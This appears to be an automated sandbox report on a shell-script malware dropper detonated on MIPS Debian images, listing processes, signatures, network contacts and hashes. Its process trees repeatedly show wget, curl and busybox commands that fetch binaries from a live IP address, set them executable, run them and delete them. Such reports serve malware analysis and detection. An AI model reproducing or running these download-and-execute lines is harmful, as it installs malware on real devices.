[/bin/busybox wget http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/bin/chmod
[chmod 777 aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao
[./aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/bin/rm
[rm aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/usr/bin/wget
[wget http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/bin/chmod
[chmod 777 8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf
[./8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/bin/rm
[rm 8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/usr/bin/wget
[wget http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/bin/chmod
[chmod 777 xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5
[./xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/bin/rm
[rm xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
Network
| Country | Destination | Domain | Proto |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
Files
/tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
memory/761-1-0xb6778000-0xb6789044-memory.dmp
memory/824-2-0xb674f000-0xb6760044-memory.dmp
memory/896-3-0xb66fe000-0xb670f044-memory.dmp
memory/936-4-0xb672d000-0xb673e044-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-21 01:07
Reported
2024-11-21 01:09
Platform
debian9-mipsbe-20240729-en
Max time kernel
74s
Max time network
76s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok | /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok | N/A |
| N/A | /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo | /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo | N/A |
| N/A | /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P | /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P | N/A |
| N/A | /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw | /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw | N/A |
| N/A | /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 | /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 | N/A |
| N/A | /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 | /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 | N/A |
| N/A | /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in | /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in | N/A |
| N/A | /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR | /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR | N/A |
| N/A | /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss | /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss | N/A |
| N/A | /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw | /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw | N/A |
| N/A | /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE | /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE | N/A |
| N/A | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | N/A |
| N/A | /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf | /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf | N/A |
| N/A | /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 | /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | N/A |
| N/A | N/A | /bin/rm | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw | /usr/bin/curl | N/A |
Processes
/tmp/85e6576f611d87e3ca88bd0764c96ad01c46376d6fcf2bb1b792e76f59eba88a.sh
[/tmp/85e6576f611d87e3ca88bd0764c96ad01c46376d6fcf2bb1b792e76f59eba88a.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/bin/chmod
[chmod 777 57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok
[./57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/bin/rm
[rm 57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
Network
| Country | Destination | Domain | Proto |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
Files
/tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-21 01:07
Reported
2024-11-21 01:09
Platform
debian9-mipsel-20240226-en
Max time kernel
137s
Max time network
140s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok | /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok | N/A |
| N/A | /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo | /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo | N/A |
| N/A | /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P | /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P | N/A |
| N/A | /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw | /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw | N/A |
| N/A | /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 | /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 | N/A |
| N/A | /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 | /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 | N/A |
| N/A | /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in | /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in | N/A |
| N/A | /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR | /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR | N/A |
| N/A | /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss | /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss | N/A |
| N/A | /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw | /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw | N/A |
| N/A | /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE | /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE | N/A |
| N/A | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | N/A |
| N/A | /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf | /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf | N/A |
| N/A | /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 | /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | N/A |
| N/A | N/A | /bin/busybox | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE | /usr/bin/curl | N/A |
Processes
/tmp/85e6576f611d87e3ca88bd0764c96ad01c46376d6fcf2bb1b792e76f59eba88a.sh
[/tmp/85e6576f611d87e3ca88bd0764c96ad01c46376d6fcf2bb1b792e76f59eba88a.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/bin/chmod
[chmod 777 57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok
[./57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/bin/rm
[rm 57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/bin/chmod
[chmod 777 Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss
[./Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/bin/rm
[rm Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/usr/bin/wget
[wget http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/bin/chmod
[chmod 777 Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw
[./Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/bin/rm
[rm Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/usr/bin/wget
[wget http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/bin/chmod
[chmod 777 rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE
[./rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/bin/rm
[rm rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/usr/bin/wget
[wget http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/bin/chmod
[chmod 777 aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao
[./aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/bin/rm
[rm aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/usr/bin/wget
[wget http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/bin/chmod
[chmod 777 8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf
[./8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/bin/rm
[rm 8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/usr/bin/wget
[wget http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/bin/chmod
[chmod 777 xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5
[./xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/bin/rm
[rm xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
Network
| Country | Destination | Domain | Proto |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
Files
/tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |